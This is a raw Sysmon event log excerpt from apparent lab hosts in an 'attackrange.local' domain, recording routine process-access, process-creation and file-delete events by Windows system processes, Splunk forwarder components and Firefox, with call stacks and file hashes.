07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.916{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.562{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA5FF9CA51531DCDAB896B4EBC01FE12,SHA256=D6B923BF662BF19A5243172BE48C25B4942ACF617245B6ECD3CF70F574EDFA76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.232{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A4134EB33C8FB90A85DB142260A12C,SHA256=0D51560CDFE78C5EEEC597B3D68BB5C163E507BEC0967DBFFFF9371EC198B50B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:53.407{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=735F66DAE9763B61EF737494403D0858,SHA256=9E23AED9554ADF8B229472A1C420CA90FBEF048FED2DFB70E8EBC22C6569F435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9C549520E1FE63DDAF46BEA6CF67100,SHA256=7FFC70E93FD80D88421438ED85DAA66902DF679A3462B32408CD99FB3BC5A6F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.799{466BC892-F36D-60EB-037D-00000000CF01}1049996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.594{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DBF7D84695EC2AD038CC192CDE804B14,SHA256=8C592A661A23E14AA1FC8175FB9D706319D61EAB3D01865A3B6743974F3D363B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=505F1747F4F51F2525619F766AEE12AE,SHA256=F3496DB0B27B186110F1EC85F99C76F77CF50C99CC1D39BA74C253C509DA1E67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29BD216D498F41656977A6703D0C1875,SHA256=B4056BF33C0B5BBCC45A942AAA61DC8F428DCD62E6D1009FB8CB94AF79F2685C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=258CA4FA98930E55679EE855F449D8CF,SHA256=2141406EFE53BF3B035705960C08124FBE235CF8D8C0B52EC4122E4FBF009E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=554FB01AE03220BE11DEDDACB4AD80D6,SHA256=C437483059B5CE8D54FB729C7E0CF010315372BCDF56FF8C5D20D2AE1670929E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4AAD769E16DCEC499CCD013EC58C3092,SHA256=7EF455E87B220EEDCA31F306549E54259EF6E6FCA7F053EEE54F06884E289847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9BBA6746BE60652408F1B4F21CCCB7A9,SHA256=062EAE80BDD5F96C851B9E7B72A7D582E7CD0A6FC4287DFDDFCEACCBA0BBC624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 